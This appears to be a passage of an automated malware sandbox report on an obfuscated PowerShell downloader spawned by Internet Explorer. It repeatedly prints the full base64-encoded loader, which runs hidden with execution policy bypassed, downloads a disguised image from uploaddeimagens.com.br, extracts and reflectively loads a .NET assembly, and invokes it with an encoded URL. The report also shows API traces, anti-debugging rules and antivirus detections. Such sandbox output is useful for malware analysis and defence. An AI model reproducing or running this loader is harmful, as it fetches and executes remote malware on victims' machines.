AH0AOwB7ADEAfQBzAHQAYQByAHQASQBuAGQAZQB4ACAAPQAgAHsAMQB9AGkAbQBhAGcAZQBUAGUAeAAnACsAJwB0AC4ASQBuAGQAZQAnACsAJwB4AE8AZgAoAHsAMQB9AHMAdABhAHIAdABGAGwAYQBnACkAOwB7ACcAKwAnADEAfQBlAG4AZABJAG4AZABlAHgAIAA9ACAAewAxAH0AaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAewAxACcAKwAnAH0AJwArACcAZQBuAGQARgBsAGEAZwApADsAewAxAH0AcwAnACsAJwB0AGEAcgB0AEkAbgAnACsAJwBkAGUAeAAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIAB7ADEAfQBlACcAKwAnAG4AZABJAG4AZABlAHgAIAAtAGcAdAAgAHsAMQB9AHMAdABhAHIAdABJAG4AZABlAHgAOwB7ADEAfQBzAHQAYQAnACsAJwByAHQASQBuAGQAZQB4ACAAKwA9ACAAewAxAH0AJwArACcAcwB0AGEAJwArACcAcgAnACsAJwB0AEYAbABhAGcALgBMAGUAbgBnAHQAaAA7AHsAMQB9AGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACAAPQAgAHsAMQB9AGUAbgAnACsAJwBkAEkAbgBkAGUAeAAgAC0AIAB7ADEAfQBzAHQAYQByAHQASQBuAGQAZQB4ADsAewAxAH0AYgBhAHMAZQA2ADQAQwBvAG0AbQBhACcAKwAnAG4AZAAgAD0AIAB7ADEAfQBpAG0AJwArACcAYQBnAGUAVABlAHgAdAAuAFMAdQBiAHMAdAByAGkAbgBnACgAewAxAH0AcwB0AGEAcgB0AEkAJwArACcAbgBkAGUAeAAsACAAewAxAH0AYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAKQA7AHsAMQB9AGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACAAPQAgAFsAUwB5AHMAdAAnACsAJwBlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAB7ADEAfQBiAGEAcwBlADYANABDACcAKwAnAG8AbQBtAGEAbgBkACkAOwB7ADEAfQBsAG8AYQBkAGUAZABBAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvACcAKwAnAGEAZAAoAHsAMQB9AGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACkAOwB7ADEAfQB0AHkAcABlACAAPQAgAHsAMQB9AGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAB7ADAAfQBGAGkAYgBlAHIALgBIAG8AbQBlAHsAMAB9ACkAOwB7ADEAfQBtAGUAdABoAG8AZAAgAD0AIAB7ADEAfQB0AHkAcABlAC4ARwBlAHQATQBlAHQAaABvAGQAKAB7ADAAfQBWAEEASQB7ADAAfQApAC4ASQBuAHYAbwBrAGUAKAB7ADEAfQBuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdACAAKAB7ADAAfQBNAGoAUQB3AFkAMgBZAHoAWgBEAEUANQBPAFQAQgBoAEwAVwBFADEAWQBtAEUAdABaAFQARQB4ACcAKwAnAE4AQwAwAHoATQBXAE0ANABMAFQAWQAnACsAJwB4AE0ARAAnACsAJwBZADEATwBEAEkAeABQAFcANQBsAGEAMgA5ADAASgBtAEYAcABaAEcAVgB0AFAAWABSAHMAWQBUADkAMABlAEgAUQB1AE4ARABaAGwAYwAyAEYAaQBjAEcAOQBqAGMAMgBWAHoAZQBXADAAdgBiAHkAOQB0ACcAKwAnAGIAMgBNAHUAZABHADkAdwBjADMAQgB3AFkAUwA0ADIATgBHAEUAeABNAGkAMQBrAGEAVwA5AHkAWgBDADkAJwArACcAaQBMAHoAQgAyAEwAMgAxAHYAWQB5ADUAegBhAFgAQgBoAFoAVwB4AG4AYgAyADkAbgBMAG0AVgBuAFkAWABKAHYAZABIAE4AbABjADIARgBpAFoAWABKAHAAWgBpADgAdgBPAG4ATgB3AGQASAAnACsAJwBSAG8AewAwAH0AIAAsACAAewAwAH0AZABmAGQAZgBkAHsAMAB9ACAALAAgAHsAMAB9AGQAZgBkAGYAewAwAH0AIAAsACAAewAwAH0AZABmAGQAZgB7ADAAfQAgACwAIAB7ADAAfQBkAGEAZABzAGEAewAwAH0AIAAsACAAewAnACsAJwAwAH0AZABlAHsAMAB9ACAALAAgAHsAMAB9AGMAdQB7ADAAfQApACcAKwAnACkAJwApAC0AZgAgACAAWwBDAEgAYQBSAF0AMwA5ACwAWwBDAEgAYQBSAF0AMwA2ACkAIAApAA==';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
filepath: powershell
1 1 0

CreateProcessInternalW

 thread_identifier: 1336
thread_handle: 0x0000000000000338
process_identifier: 1356
current_directory: C:\Users\test22\Desktop
filepath:
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $PShOme[4]+$pSHoME[34]+'X')((('{1}imageUrl = {0}https://uploaddeimagens.co'+'m.br/images/004/667/608/original/hta.jpg?1700268840{0};{1}webClien'+'t = New-Object System.Net.We'+'bClient;{1}imageBytes'+' = {1}webClient.DownloadData({1}imag'+'eUrl);{1}imag'+'eText = '+'[System.Text.Encoding]::UTF8.GetString({1}imag'+'eBytes);{1}startFlag = {0}<<BASE64_START>>{0};{1}endFlag = {0}<<BASE64_END'+'>>{0};{1}startIndex = {1}imageTex'+'t.Inde'+'xOf({1}startFlag);{'+'1}endIndex = {1}imageText.IndexOf({1'+'}'+'endFlag);{1}s'+'tartIn'+'dex -ge 0 -and {1}e'+'ndIndex -gt {1}startIndex;{1}sta'+'rtIndex += {1}'+'sta'+'r'+'tFlag.Length;{1}base64Length = {1}en'+'dIndex - {1}startIndex;{1}base64Comma'+'nd = {1}im'+'ageText.Substring({1}startI'+'ndex, {1}base64Length);{1}commandBytes = [Syst'+'em.Convert]::FromBase64String({1}base64C'+'ommand);{1}loadedAssembly = [System.Reflection.Assembly]::Lo'+'ad({1}commandBytes);{1}type = {1}loadedAssembly.GetType({0}Fiber.Home{0});{1}method = {1}type.GetMethod({0}VAI{0}).Invoke({1}null, [object[]] ({0}MjQwY2YzZDE5OTBhLWE1YmEtZTEx'+'NC0zMWM4LTY'+'xMD'+'Y1ODIxPW5la290JmFpZGVtPXRsYT90eHQuNDZlc2FicG9jc2VzeW0vby9t'+'b2MudG9wc3BwYS42NGExMi1kaW9yZC9'+'iLzB2L21vYy5zaXBhZWxnb29nLmVnYXJvdHNlc2FiZXJpZi8vOnNwdH'+'Ro{0} , {0}dfdfd{0} , {0}dfdf{0} , {0}dfdf{0} , {0}dadsa{0} , {'+'0}de{0} , {0}cu{0})'+')')-f [CHaR]39,[CHaR]36) )"
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 1
process_handle: 0x000000000000036c
1 1 0
Symantec CL.Downloader!gen11
Kaspersky HEUR:Trojan.Script.Generic
Ikarus Trojan.VBS.Agent
Google Detected
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2712
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x000007fffff80000
process_handle: 0xffffffffffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
Data received [
Data received Wee:R0„;Ûú¢5;}&cY…gä¡øÜDOWNGRD 9oµ²¶ù,4”Tʾñå¨jIe<ÜÁÐË­Í<4z‹wNÀ ÿ 
Data received Q
Data received “
Data received A„Q÷ºÀ>_q;E_yÊ.•ù^½°>¥¥Mh’ûŸ²²ô`‡–€ÚhôJTÿ³h³2¿Sm8™©Ó XIµªÞFH0F!×]ßãR´L ̤1}A0娹šß‰GÚ§Ý!Ðz¶oã—Ëaq¤¡W#_¯¹†4?ÊÒ(eG×£õ«K#
Data received 
Data received 
Data received 
Data received 
Data received 0
Data received ºÍtEïÖ4ßàTJ«éŜ€-È»ìÑaˆµ\dç–м˜ˆ€Ä؟ñ|µó©É
Data sent yuee:Iîxùš)›¶Ÿ%8û°®/ºŠž!±Æç\rä/5 ÀÀÀ À 284ÿuploaddeimagens.com.br  
Data sent FBAàR1SšÑ+s0¥FÁœ‹FYuh%¡ý+[|Pa]²ð-» ¨öΨu¤¬ËµNÕ¾Ü<2¹¯yúoÅ06âø¦ZBÿ¿€õ}w1 ½Wën¹)Õ5´ëNÆ~­ÌtΫé>ÎÔÀ§,á/¶
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
cmdline "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2624 CREDAT:145409
parent_process iexplore.exe martian_process powershell -command $Codigo = 'LgAgACgAIAAkAFAAUwBoAE8AbQBlAFsANABdACsAJABwAFMASABvAE0ARQBbADMANABdACsAJwBYACcAKQAoACgAKAAnAHsAMQB9AGkAbQBhAGcAZQBVAHIAbAAgAD0AIAB7ADAAfQBoAHQAdABwAHMAOgAvAC8AdQBwAGwAbwBhAGQAZABlAGkAbQBhAGcAZQBuAHMALgBjAG8AJwArACcAbQAuAGIAcgAvAGkAbQBhAGcAZQBzAC8AMAAwADQALwA2ADYANwAvADYAMAA4AC8AbwByAGkAZwBpAG4AYQBsAC8AaAB0AGEALgBqAHAAZwA/ADEANwAwADAAMgA2ADgAOAA0ADAAewAwAH0AOwB7ADEAfQB3AGUAYgBDAGwAaQBlAG4AJwArACcAdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQAnACsAJwBiAEMAbABpAGUAbgB0ADsAewAxAH0AaQBtAGEAZwBlAEIAeQB0AGUAcwAnACsAJwAgAD0AIAB7ADEAfQB3AGUAYgBDAGwAaQBlAG4AdAAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAewAxAH0AaQBtAGEAZwAnACsAJwBlAFUAcgBsACkAOwB7ADEAfQBpAG0AYQBnACcAKwAnAGUAVABlAHgAdAAgAD0AIAAnACsAJwBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAB7ADEAfQBpAG0AYQBnACcAKwAnAGUAQgB5AHQAZQBzACkAOwB7ADEAfQBzAHQAYQByAHQARgBsAGEAZwAgAD0AIAB7ADAAfQA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+AHsAMAB9ADsAewAxAH0AZQBuAGQARgBsAGEAZwAgAD0AIAB7ADAAfQA8ADwAQgBBAFMARQA2ADQAXwBFAE4ARAAnACsAJwA+AD4AewAwAH0AOwB7ADEAfQBzAHQAYQByAHQASQBuAGQAZQB4ACAAPQAgAHsAMQB9AGkAbQBhAGcAZQBUAGUAeAAnACsAJwB0AC4ASQBuAGQAZQAnACsAJwB4AE8AZgAoAHsAMQB9AHMAdABhAHIAdABGAGwAYQBnACkAOwB7ACcAKwAnADEAfQBlAG4AZABJAG4AZABlAHgAIAA9ACAAewAxAH0AaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAewAxACcAKwAnAH0AJwArACcAZQBuAGQARgBsAGEAZwApADsAewAxAH0AcwAnACsAJwB0AGEAcgB0AEkAbgAnACsAJwBkAGUAeAAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIAB7ADEAfQBlACcAKwAnAG4AZABJAG4AZABlAHgAIAAtAGcAdAAgAHsAMQB9AHMAdABhAHIAdABJAG4AZABlAHgAOwB7ADEAfQBzAHQAYQAnACsAJwByAHQASQBuAGQAZQB4ACAAKwA9ACAAewAxAH0AJwArACcAcwB0AGEAJwArACcAcgAnACsAJwB0AEYAbABhAGcALgBMAGUAbgBnAHQAaAA7AHsAMQB9AGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACAAPQAgAHsAMQB9AGUAbgAnACsAJwBkAEkAbgBkAGUAeAAgAC0AIAB7ADEAfQBzAHQAYQByAHQASQBuAGQAZQB4ADsAewAxAH0AYgBhAHMAZQA2ADQAQwBvAG0AbQBhACcAKwAnAG4AZAAgAD0AIAB7ADEAfQBpAG0AJwArACcAYQBnAGUAVABlAHgAdAAuAFMAdQBiAHMAdAByAGkAbgBnACgAewAxAH0AcwB0AGEAcgB0AEkAJwArACcAbgBkAGUAeAAsACAAewAxAH0AYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAKQA7AHsAMQB9AGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACAAPQAgAFsAUwB5AHMAdAAnACsAJwBlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAB7ADEAfQBiAGEAcwBlADYANABDACcAKwAnAG8AbQBtAGEAbgBkACkAOwB7ADEAfQBsAG8AYQBkAGUAZABBAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvACcAKwAnAGEAZAAoAHsAMQB9AGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACkAOwB7ADEAfQB0AHkAcABlACAAPQAgAHsAMQB9AGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAB7ADAAfQBGAGkAYgBlAHIALgBIAG8AbQBlAHsAMAB9ACkAOwB7ADEAfQBtAGUAdABoAG8AZAAgAD0AIAB7ADEAfQB0AHkAcABlAC4ARwBlAHQATQBlAHQAaABvAGQAKAB7ADAAfQBWAEEASQB7ADAAfQApAC4ASQBuAHYAbwBrAGUAKAB7ADEAfQBuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdACAAKAB7ADAAfQBNAGoAUQB3AFkAMgBZAHoAWgBEAEUANQBPAFQAQgBoAEwAVwBFADEAWQBtAEUAdABaAFQARQB4ACcAKwAnAE4AQwAwAHoATQBXAE0ANABMAFQAWQAnACsAJwB4AE0ARAAnACsAJwBZADEATwBEAEkAeABQAFcANQBsAGEAMgA5ADAASgBtAEYAcABaAEcAVgB0AFAAWABSAHMAWQBUADkAMABlAEgAUQB1AE4ARABaAGwAYwAyAEYAaQBjAEcAOQBqAGMAMgBWAHoAZQBXADAAdgBiAHkAOQB0ACcAKwAnAGIAMgBNAHUAZABHADkAdwBjADMAQgB3AFkAUwA0ADIATgBHAEUAeABNAGkAMQBrAGEAVwA5AHkAWgBDADkAJwArACcAaQBMAHoAQgAyAEwAMgAxAHYAWQB5ADUAegBhAFgAQgBoAFoAVwB4AG4AYgAyADkAbgBMAG0AVgBuAFkAWABKAHYAZABIAE4AbABjADIARgBpAFoAWABKAHAAWgBpADgAdgBPAG4ATgB3AGQASAAnACsAJwBSAG8AewAwAH0AIAAsACAAewAwAH0AZABmAGQAZgBkAHsAMAB9ACAALAAgAHsAMAB9AGQAZgBkAGYAewAwAH0AIAAsACAAewAwAH0AZABmAGQAZgB7ADAAfQAgACwAIAB7ADAAfQBkAGEAZABzAGEAewAwAH0AIAAsACAAewAnACsAJwAwAH0AZABlAHsAMAB9ACAALAAgAHsAMAB9AGMAdQB7ADAAfQApACcAKwAnACkAJwApAC0AZgAgACAAWwBDAEgAYQBSAF0AMwA5ACwAWwBDAEgAYQBSAF0AMwA2ACkAIAApAA==';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Time & API Arguments Status Return Repeated

send

 buffer: yuee:Iîxùš)›¶Ÿ%8û°®/ºŠž!±Æç\rä/5 ÀÀÀ À 284ÿuploaddeimagens.com.br  
socket: 1224
sent: 126
1 126 0

send

 buffer: FBAàR1SšÑ+s0¥FÁœ‹FYuh%¡ý+[|Pa]²ð-» ¨öΨu¤¬ËµNÕ¾Ü<2¹¯yúoÅ06âø¦ZBÿ¿€õ}w1 ½Wën¹)Õ5´ëNÆ~­ÌtΫé>ÎÔÀ§,á/¶
socket: 1224
sent: 134
1 134 0

WSASend

 buffer: GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com
socket: 1812
0 0
parent_process iexplore.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAgACgAIAAkAFAAUwBoAE8AbQBlAFsANABdACsAJABwAFMASABvAE0ARQBbADMANABdACsAJwBYACcAKQAoACgAKAAnAHsAMQB9AGkAbQBhAGcAZQBVAHIAbAAgAD0AIAB7ADAAfQBoAHQAdABwAHMAOgAvAC8AdQBwAGwAbwBhAGQAZABlAGkAbQBhAGcAZQBuAHMALgBjAG8AJwArACcAbQAuAGIAcgAvAGkAbQBhAGcAZQBzAC8AMAAwADQALwA2ADYANwAvADYAMAA4AC8AbwByAGkAZwBpAG4AYQBsAC8AaAB0AGEALgBqAHAAZwA/ADEANwAwADAAMgA2ADgAOAA0ADAAewAwAH0AOwB7ADEAfQB3AGUAYgBDAGwAaQBlAG4AJwArACcAdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQAnACsAJwBiAEMAbABpAGUAbgB0ADsAewAxAH0AaQBtAGEAZwBlAEIAeQB0AGUAcwAnACsAJwAgAD0AIAB7ADEAfQB3AGUAYgBDAGwAaQBlAG4AdAAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAewAxAH0AaQBtAGEAZwAnACsAJwBlAFUAcgBsACkAOwB7ADEAfQBpAG0AYQBnACcAKwAnAGUAVABlAHgAdAAgAD0AIAAnACsAJwBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAB7ADEAfQBpAG0AYQBnACcAKwAnAGUAQgB5AHQAZQBzACkAOwB7ADEAfQBzAHQAYQByAHQARgBsAGEAZwAgAD0AIAB7ADAAfQA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+AHsAMAB9ADsAewAxAH0AZQBuAGQARgBsAGEAZwAgAD0AIAB7ADAAfQA8ADwAQgBBAFMARQA2ADQAXwBFAE4ARAAnACsAJwA+AD4AewAwAH0AOwB7ADEAfQBzAHQAYQByAHQASQBuAGQAZQB4ACAAPQAgAHsAMQB9AGkAbQBhAGcAZQBUAGUAeAAnACsAJwB0AC4ASQBuAGQAZQAnACsAJwB4AE8AZgAoAHsAMQB9AHMAdABhAHIAdABGAGwAYQBnACkAOwB7ACcAKwAnADEAfQBlAG4AZABJAG4AZABlAHgAIAA9ACAAewAxAH0AaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAewAxACcAKwAnAH0AJwArACcAZQBuAGQARgBsAGEAZwApADsAewAxAH0AcwAnACsAJwB0AGEAcgB0AEkAbgAnACsAJwBkAGUAeAAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIAB7ADEAfQBlACcAKwAnAG4AZABJAG4AZABlAHgAIAAtAGcAdAAgAHsAMQB9AHMAdABhAHIAdABJAG4AZABlAHgAOwB7ADEAfQBzAHQAYQAnACsAJwByAHQASQBuAGQAZQB4ACAAKwA9ACAAewAxAH0AJwArACcAcwB0AGEAJwArACcAcgAnACsAJwB0AEYAbABhAGcALgBMAGUAbgBnAHQAaAA7AHsAMQB9AGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACAAPQAgAHsAMQB9AGUAbgAnACsAJwBkAEkAbgBkAGUAeAAgAC0AIAB7ADEAfQBzAHQAYQByAHQASQBuAGQAZQB4ADsAewAxAH0AYgBhAHMAZQA2ADQAQwBvAG0AbQBhACcAKwAnAG4AZAAgAD0AIAB7ADEAfQBpAG0AJwArACcAYQBnAGUAVABlAHgAdAAuAFMAdQBiAHMAdAByAGkAbgBnACgAewAxAH0AcwB0AGEAcgB0AEkAJwArACcAbgBkAGUAeAAsACAAewAxAH0AYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAKQA7AHsAMQB9AGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACAAPQAgAFsAUwB5AHMAdAAnACsAJwBlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAB7ADEAfQBiAGEAcwBlADYANABDACcAKwAnAG8AbQBtAGEAbgBkACkAOwB7ADEAfQBsAG8AYQBkAGUAZABBAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvACcAKwAnAGEAZAAoAHsAMQB9AGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACkAOwB7ADEAfQB0AHkAcABlACAAPQAgAHsAMQB9AGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAB7ADAAfQBGAGkAYgBlAHIALgBIAG8AbQBlAHsAMAB9ACkAOwB7ADEAfQBtAGUAdABoAG8AZAAgAD0AIAB7ADEAfQB0AHkAcABlAC4ARwBlAHQATQBlAHQAaABvAGQAKAB7ADAAfQBWAEEASQB7ADAAfQApAC4ASQBuAHYAbwBrAGUAKAB7ADEAfQBuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdACAAKAB7ADAAfQBNAGoAUQB3AFkAMgBZAHoAWgBEAEUANQBPAFQAQgBoAEwAVwBFADEAWQBtAEUAdABaAFQARQB4ACcAKwAnAE4AQwAwAHoATQBXAE0ANABMAFQAWQAnACsAJwB4AE0ARAAnACsAJwBZADEATwBEAEkAeABQAFcANQBsAGEAMgA5ADAASgBtAEYAcABaAEcAVgB0AFAAWABSAHMAWQBUADkAMABlAEgAUQB1AE4ARABaAGwAYwAyAEYAaQBjAEcAOQBqAGMAMgBWAHoAZQBXADAAdgBiAHkAOQB0ACcAKwAnAGIAMgBNAHUAZABHADkAdwBjADMAQgB3AFkAUwA0ADIATgBHAEUAeABNAGkAMQBrAGEAVwA5AHkAWgBDADkAJwArACcAaQBMAHoAQgAyAEwAMgAxAHYAWQB5ADUAegBhAFgAQgBoAFoAVwB4AG4AYgAyADkAbgBMAG0AVgBuAFkAWABKAHYAZABIAE4AbABjADIARgBpAFoAWABKAHAAWgBpADgAdgBPAG4ATgB3AGQASAAnACsAJwBSAG8AewAwAH0AIAAsACAAewAwAH0AZABmAGQAZgBkAHsAMAB9ACAALAAgAHsAMAB9AGQAZgBkAGYAewAwAH0AIAAsACAAewAwAH0AZABmAGQAZgB7ADAAfQAgACwAIAB7ADAAfQBkAGEAZABzAGEAewAwAH0AIAAsACAAewAnACsAJwAwAH0AZABlAHsAMAB9ACAALAAgAHsAMAB9AGMAdQB7ADAAfQApACcAKwAnACkAJwApAC0AZgAgACAAWwBDAEgAYQBSAF0AMwA5ACwAWwBDAEgAYQBSAF0AMwA2ACkAIAApAA==';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
parent_process iexplore.exe martian_process powershell -command $Codigo = 'LgAgACgAIAAkAFAAUwBoAE8AbQBlAFsANABdACsAJABwAFMASABvAE0ARQBbADMANABdACsAJwBYACcAKQAoACgAKAAnAHsAMQB9AGkAbQBhAGcAZQBVAHIAbAAgAD0AIAB7ADAAfQBoAHQAdABwAHMAOgAvAC8AdQBwAGwAbwBhAGQAZABlAGkAbQBhAGcAZQBuAHMALgBjAG8AJwArACcAbQAuAGIAcgAvAGkAbQBhAGcAZQBzAC8AMAAwADQALwA2ADYANwAvADYAMAA4AC8AbwByAGkAZwBpAG4AYQBsAC8AaAB0AGEALgBqAHAAZwA/ADEANwAwADAAMgA2ADgAOAA0ADAAewAwAH0AOwB7ADEAfQB3AGUAYgBDAGwAaQBlAG4AJwArACcAdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQAnACsAJwBiAEMAbABpAGUAbgB0ADsAewAxAH0AaQBtAGEAZwBlAEIAeQB0AGUAcwAnACsAJwAgAD0AIAB7ADEAfQB3AGUAYgBDAGwAaQBlAG4AdAAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAewAxAH0AaQBtAGEAZwAnACsAJwBlAFUAcgBsACkAOwB7ADEAfQBpAG0AYQBnACcAKwAnAGUAVABlAHgAdAAgAD0AIAAnACsAJwBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAB7ADEAfQBpAG0AYQBnACcAKwAnAGUAQgB5AHQAZQBzACkAOwB7ADEAfQBzAHQAYQByAHQARgBsAGEAZwAgAD0AIAB7ADAAfQA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+AHsAMAB9ADsAewAxAH0AZQBuAGQARgBsAGEAZwAgAD0AIAB7ADAAfQA8ADwAQgBBAFMARQA2ADQAXwBFAE4ARAAnACsAJwA+AD4AewAwAH0AOwB7ADEAfQBzAHQAYQByAHQASQBuAGQAZQB4ACAAPQAgAHsAMQB9AGkAbQBhAGcAZQBUAGUAeAAnACsAJwB0AC4ASQBuAGQAZQAnACsAJwB4AE8AZgAoAHsAMQB9AHMAdABhAHIAdABGAGwAYQBnACkAOwB7ACcAKwAnADEAfQBlAG4AZABJAG4AZABlAHgAIAA9ACAAewAxAH0AaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAewAxACcAKwAnAH0AJwArACcAZQBuAGQARgBsAGEAZwApADsAewAxAH0AcwAnACsAJwB0AGEAcgB0AEkAbgAnACsAJwBkAGUAeAAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIAB7ADEAfQBlACcAKwAnAG4AZABJAG4AZABlAHgAIAAtAGcAdAAgAHsAMQB9AHMAdABhAHIAdABJAG4AZABlAHgAOwB7ADEAfQBzAHQAYQAnACsAJwByAHQASQBuAGQAZQB4ACAAKwA9ACAAewAxAH0AJwArACcAcwB0AGEAJwArACcAcgAnACsAJwB0AEYAbABhAGcALgBMAGUAbgBnAHQAaAA7AHsAMQB9AGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACAAPQAgAHsAMQB9AGUAbgAnACsAJwBkAEkAbgBkAGUAeAAgAC0AIAB7ADEAfQBzAHQAYQByAHQASQBuAGQAZQB4ADsAewAxAH0AYgBhAHMAZQA2ADQAQwBvAG0AbQBhACcAKwAnAG4AZAAgAD0AIAB7ADEAfQBpAG0AJwArACcAYQBnAGUAVABlAHgAdAAuAFMAdQBiAHMAdAByAGkAbgBnACgAewAxAH0AcwB0AGEAcgB0AEkAJwArACcAbgBkAGUAeAAsACAAewAxAH0AYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAKQA7AHsAMQB9AGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACAAPQAgAFsAUwB5AHMAdAAnACsAJwBlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAB7ADEAfQBiAGEAcwBlADYANABDACcAKwAnAG8AbQBtAGEAbgBkACkAOwB7ADEAfQBsAG8AYQBkAGUAZABBAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvACcAKwAnAGEAZAAoAHsAMQB9AGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACkAOwB7ADEAfQB0AHkAcABlACAAPQAgAHsAMQB9AGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAB7ADAAfQBGAGkAYgBlAHIALgBIAG8AbQBlAHsAMAB9ACkAOwB7ADEAfQBtAGUAdABoAG8AZAAgAD0AIAB7ADEAfQB0AHkAcABlAC4ARwBlAHQATQBlAHQAaABvAGQAKAB7ADAAfQBWAEEASQB7ADAAfQApAC4ASQBuAHYAbwBrAGUAKAB7ADEAfQBuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdACAAKAB7ADAAfQBNAGoAUQB3AFkAMgBZAHoAWgBEAEUANQBPAFQAQgBoAEwAVwBFADEAWQBtAEUAdABaAFQARQB4ACcAKwAnAE4AQwAwAHoA